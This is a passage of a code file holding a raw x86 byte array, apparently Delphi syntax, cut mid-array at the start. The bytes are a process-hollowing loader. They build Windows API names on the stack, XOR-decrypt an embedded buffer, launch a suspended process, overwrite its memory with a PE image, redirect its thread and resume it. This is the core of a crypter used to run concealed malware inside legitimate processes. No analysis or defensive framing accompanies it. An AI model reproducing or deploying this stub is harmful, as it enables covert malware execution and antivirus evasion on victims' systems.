$65,$C6,$45,$8D,$46,$C6,$45,$8E,$69,$C6,$45,$8F,$6C,$C6,$45,$90,$65,$C6,$45,$91,$4E,$C6,$45,$92,$61,
$C6,$45,$93,$6D,$C6,$45,$94,$65,$C6,$45,$95,$41,$C6,$45,$96,$00,$C6,$85,$6F,$FF,$FF,$FF,$5A,$C6,$85,
$70,$FF,$FF,$FF,$77,$C6,$85,$71,$FF,$FF,$FF,$55,$C6,$85,$72,$FF,$FF,$FF,$6E,$C6,$85,$73,$FF,$FF,$FF,
$6D,$C6,$85,$74,$FF,$FF,$FF,$61,$C6,$85,$75,$FF,$FF,$FF,$70,$C6,$85,$76,$FF,$FF,$FF,$56,$C6,$85,$77,
$FF,$FF,$FF,$69,$C6,$85,$78,$FF,$FF,$FF,$65,$C6,$85,$79,$FF,$FF,$FF,$77,$C6,$85,$7A,$FF,$FF,$FF,$4F,
$C6,$85,$7B,$FF,$FF,$FF,$66,$C6,$85,$7C,$FF,$FF,$FF,$53,$C6,$85,$7D,$FF,$FF,$FF,$65,$C6,$85,$7E,$FF,
$FF,$FF,$63,$C6,$85,$7F,$FF,$FF,$FF,$74,$C6,$45,$80,$69,$C6,$45,$81,$6F,$C6,$45,$82,$6E,$C6,$45,$83,
$00,$C6,$85,$60,$FF,$FF,$FF,$56,$C6,$85,$61,$FF,$FF,$FF,$69,$C6,$85,$62,$FF,$FF,$FF,$72,$C6,$85,$63,
$FF,$FF,$FF,$74,$C6,$85,$64,$FF,$FF,$FF,$75,$C6,$85,$65,$FF,$FF,$FF,$61,$C6,$85,$66,$FF,$FF,$FF,$6C,
$C6,$85,$67,$FF,$FF,$FF,$41,$C6,$85,$68,$FF,$FF,$FF,$6C,$C6,$85,$69,$FF,$FF,$FF,$6C,$C6,$85,$6A,$FF,
$FF,$FF,$6F,$C6,$85,$6B,$FF,$FF,$FF,$63,$C6,$85,$6C,$FF,$FF,$FF,$45,$C6,$85,$6D,$FF,$FF,$FF,$78,$C6,
$85,$6E,$FF,$FF,$FF,$00,$C6,$85,$4F,$FF,$FF,$FF,$56,$C6,$85,$50,$FF,$FF,$FF,$69,$C6,$85,$51,$FF,$FF,
$FF,$72,$C6,$85,$52,$FF,$FF,$FF,$74,$C6,$85,$53,$FF,$FF,$FF,$75,$C6,$85,$54,$FF,$FF,$FF,$61,$C6,$85,
$55,$FF,$FF,$FF,$6C,$C6,$85,$56,$FF,$FF,$FF,$50,$C6,$85,$57,$FF,$FF,$FF,$72,$C6,$85,$58,$FF,$FF,$FF,
$6F,$C6,$85,$59,$FF,$FF,$FF,$74,$C6,$85,$5A,$FF,$FF,$FF,$65,$C6,$85,$5B,$FF,$FF,$FF,$63,$C6,$85,$5C,
$FF,$FF,$FF,$74,$C6,$85,$5D,$FF,$FF,$FF,$45,$C6,$85,$5E,$FF,$FF,$FF,$78,$C6,$85,$5F,$FF,$FF,$FF,$00,
$C6,$85,$3D,$FF,$FF,$FF,$52,$C6,$85,$3E,$FF,$FF,$FF,$65,$C6,$85,$3F,$FF,$FF,$FF,$61,$C6,$85,$40,$FF,
$FF,$FF,$64,$C6,$85,$41,$FF,$FF,$FF,$50,$C6,$85,$42,$FF,$FF,$FF,$72,$C6,$85,$43,$FF,$FF,$FF,$6F,$C6,
$85,$44,$FF,$FF,$FF,$63,$C6,$85,$45,$FF,$FF,$FF,$65,$C6,$85,$46,$FF,$FF,$FF,$73,$C6,$85,$47,$FF,$FF,
$FF,$73,$C6,$85,$48,$FF,$FF,$FF,$4D,$C6,$85,$49,$FF,$FF,$FF,$65,$C6,$85,$4A,$FF,$FF,$FF,$6D,$C6,$85,
$4B,$FF,$FF,$FF,$6F,$C6,$85,$4C,$FF,$FF,$FF,$72,$C6,$85,$4D,$FF,$FF,$FF,$79,$C6,$85,$4E,$FF,$FF,$FF,
$00,$C6,$85,$2A,$FF,$FF,$FF,$57,$C6,$85,$2B,$FF,$FF,$FF,$72,$C6,$85,$2C,$FF,$FF,$FF,$69,$C6,$85,$2D,
$FF,$FF,$FF,$74,$C6,$85,$2E,$FF,$FF,$FF,$65,$C6,$85,$2F,$FF,$FF,$FF,$50,$C6,$85,$30,$FF,$FF,$FF,$72,
$C6,$85,$31,$FF,$FF,$FF,$6F,$C6,$85,$32,$FF,$FF,$FF,$63,$C6,$85,$33,$FF,$FF,$FF,$65,$C6,$85,$34,$FF,
$FF,$FF,$73,$C6,$85,$35,$FF,$FF,$FF,$73,$C6,$85,$36,$FF,$FF,$FF,$4D,$C6,$85,$37,$FF,$FF,$FF,$65,$C6,
$85,$38,$FF,$FF,$FF,$6D,$C6,$85,$39,$FF,$FF,$FF,$6F,$C6,$85,$3A,$FF,$FF,$FF,$72,$C6,$85,$3B,$FF,$FF,
$FF,$79,$C6,$85,$3C,$FF,$FF,$FF,$00,$C6,$85,$19,$FF,$FF,$FF,$47,$C6,$85,$1A,$FF,$FF,$FF,$65,$C6,$85,
$1B,$FF,$FF,$FF,$74,$C6,$85,$1C,$FF,$FF,$FF,$54,$C6,$85,$1D,$FF,$FF,$FF,$68,$C6,$85,$1E,$FF,$FF,$FF,
$72,$C6,$85,$1F,$FF,$FF,$FF,$65,$C6,$85,$20,$FF,$FF,$FF,$61,$C6,$85,$21,$FF,$FF,$FF,$64,$C6,$85,$22,
$FF,$FF,$FF,$43,$C6,$85,$23,$FF,$FF,$FF,$6F,$C6,$85,$24,$FF,$FF,$FF,$6E,$C6,$85,$25,$FF,$FF,$FF,$74,
$C6,$85,$26,$FF,$FF,$FF,$65,$C6,$85,$27,$FF,$FF,$FF,$78,$C6,$85,$28,$FF,$FF,$FF,$74,$C6,$85,$29,$FF,
$FF,$FF,$00,$C6,$85,$08,$FF,$FF,$FF,$53,$C6,$85,$09,$FF,$FF,$FF,$65,$C6,$85,$0A,$FF,$FF,$FF,$74,$C6,
$85,$0B,$FF,$FF,$FF,$54,$C6,$85,$0C,$FF,$FF,$FF,$68,$C6,$85,$0D,$FF,$FF,$FF,$72,$C6,$85,$0E,$FF,$FF,
$FF,$65,$C6,$85,$0F,$FF,$FF,$FF,$61,$C6,$85,$10,$FF,$FF,$FF,$64,$C6,$85,$11,$FF,$FF,$FF,$43,$C6,$85,
$12,$FF,$FF,$FF,$6F,$C6,$85,$13,$FF,$FF,$FF,$6E,$C6,$85,$14,$FF,$FF,$FF,$74,$C6,$85,$15,$FF,$FF,$FF,
$65,$C6,$85,$16,$FF,$FF,$FF,$78,$C6,$85,$17,$FF,$FF,$FF,$74,$C6,$85,$18,$FF,$FF,$FF,$00,$C6,$85,$FB,
$FE,$FF,$FF,$52,$C6,$85,$FC,$FE,$FF,$FF,$65,$C6,$85,$FD,$FE,$FF,$FF,$73,$C6,$85,$FE,$FE,$FF,$FF,$75,
$C6,$85,$FF,$FE,$FF,$FF,$6D,$C6,$85,$00,$FF,$FF,$FF,$65,$C6,$85,$01,$FF,$FF,$FF,$54,$C6,$85,$02,$FF,
$FF,$FF,$68,$C6,$85,$03,$FF,$FF,$FF,$72,$C6,$85,$04,$FF,$FF,$FF,$65,$C6,$85,$05,$FF,$FF,$FF,$61,$C6,
$85,$06,$FF,$FF,$FF,$64,$C6,$85,$07,$FF,$FF,$FF,$00,$C6,$45,$E2,$6E,$C6,$45,$E3,$74,$C6,$45,$E4,$64,
$C6,$45,$E5,$6C,$C6,$45,$E6,$6C,$C6,$45,$E7,$00,$C6,$85,$EC,$FE,$FF,$FF,$43,$C6,$85,$ED,$FE,$FF,$FF,
$72,$C6,$85,$EE,$FE,$FF,$FF,$65,$C6,$85,$EF,$FE,$FF,$FF,$61,$C6,$85,$F0,$FE,$FF,$FF,$74,$C6,$85,$F1,
$FE,$FF,$FF,$65,$C6,$85,$F2,$FE,$FF,$FF,$50,$C6,$85,$F3,$FE,$FF,$FF,$72,$C6,$85,$F4,$FE,$FF,$FF,$6F,
$C6,$85,$F5,$FE,$FF,$FF,$63,$C6,$85,$F6,$FE,$FF,$FF,$65,$C6,$85,$F7,$FE,$FF,$FF,$73,$C6,$85,$F8,$FE,
$FF,$FF,$73,$C6,$85,$F9,$FE,$FF,$FF,$41,$C6,$85,$FA,$FE,$FF,$FF,$00,$C6,$85,$DF,$FE,$FF,$FF,$4C,$C6,
$85,$E0,$FE,$FF,$FF,$6F,$C6,$85,$E1,$FE,$FF,$FF,$61,$C6,$85,$E2,$FE,$FF,$FF,$64,$C6,$85,$E3,$FE,$FF,
$FF,$4C,$C6,$85,$E4,$FE,$FF,$FF,$69,$C6,$85,$E5,$FE,$FF,$FF,$62,$C6,$85,$E6,$FE,$FF,$FF,$72,$C6,$85,
$E7,$FE,$FF,$FF,$61,$C6,$85,$E8,$FE,$FF,$FF,$72,$C6,$85,$E9,$FE,$FF,$FF,$79,$C6,$85,$EA,$FE,$FF,$FF,
$41,$C6,$85,$EB,$FE,$FF,$FF,$00,$8D,$85,$DF,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$E8,
$8B,$75,$0C,$4E,$85,$F6,$7C,$17,$46,$33,$DB,$8B,$45,$08,$8A,$04,$03,$34,$2A,$34,$87,$8B,$55,$08,$88,
$04,$13,$43,$4E,$75,$EC,$8B,$45,$08,$89,$45,$AC,$8D,$45,$97,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,
$8D,$45,$84,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$F0,$6A,$69,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,
$D3,$50,$FF,$D6,$8D,$85,$7C,$FE,$FF,$FF,$BB,$43,$00,$00,$00,$C6,$04,$03,$00,$4B,$83,$FB,$FF,$75,$F6,
$C7,$85,$7C,$FE,$FF,$FF,$44,$00,$00,$00,$8D,$85,$EC,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,
$D8,$8D,$85,$C0,$FE,$FF,$FF,$50,$8D,$85,$7C,$FE,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,$6A,$00,$6A,$00,
$6A,$00,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,$D3,$8D,$85,$19,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,
$55,$EC,$8B,$D8,$C7,$85,$B0,$FD,$FF,$FF,$07,$00,$01,$00,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,
$FF,$FF,$50,$FF,$D3,$8D,$85,$3D,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8D,$45,$D0,$50,
$6A,$04,$8D,$45,$C8,$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,
$8D,$85,$6F,$FF,$FF,$FF,$50,$8D,$45,$E2,$50,$FF,$55,$E8,$50,$FF,$55,$EC,$8B,$D8,$8B,$45,$C8,$50,$8B,
$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$8B,$45,$AC,$8B,$40,$3C,$03,$45,$AC,$89,$45,$D4,$8D,$85,$60,$FF,$FF,
$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$6A,$40,$68,$00,$30,$00,$00,$8B,$45,$D4,$8B,$40,$50,$50,
$8B,$45,$D4,$8B,$40,$34,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$89,$45,$C8,$8D,$85,$2A,$FF,$FF,$FF,
$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F4,$8D,$45,$CC,$50,$8B,$45,$D4,$8B,$40,$54,$50,$8B,$45,$AC,
$50,$8B,$45,$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8D,$78,$18,$8B,$45,$D4,$0F,
$B7,$40,$14,$03,$F8,$8D,$85,$4F,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F8,$C7,$85,$90,
$FD,$FF,$FF,$01,$00,$00,$00,$C7,$85,$94,$FD,$FF,$FF,$10,$00,$00,$00,$C7,$85,$98,$FD,$FF,$FF,$02,$00,
$00,$00,$C7,$85,$9C,$FD,$FF,$FF,$20,$00,$00,$00,$C7,$85,$A0,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$A4,
$FD,$FF,$FF,$40,$00,$00,$00,$C7,$85,$A8,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$AC,$FD,$FF,$FF,$40,$00,
$00,$00,$8B,$45,$D4,$0F,$B7,$70,$06,$4E,$85,$F6,$7C,$66,$46,$33,$DB,$8D,$45,$CC,$50,$8D,$04,$9B,$8B,
$44,$C7,$10,$50,$8D,$04,$9B,$8B,$44,$C7,$14,$03,$45,$AC,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,$C8,
$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8D,$45,$C4,$50,$8D,$04,$9B,$8B,$44,$C7,$24,$C1,$E8,$1D,
$8B,$84,$85,$90,$FD,$FF,$FF,$50,$8D,$04,$9B,$8B,$44,$C7,$08,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,
$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F8,$43,$4E,$75,$9D,$8D,$45,$CC,$50,$6A,$04,$8D,$45,$C8,
$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8B,
$40,$28,$03,$45,$C8,$89,$85,$60,$FE,$FF,$FF,$8D,$85,$08,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,
$8B,$D8,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$8D,$85,$FB,$FE,$FF,$FF,$50,
$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$5F,$5E,$5B,$8B,$E5,$5D,$C2,
$08,$00                 
);

 



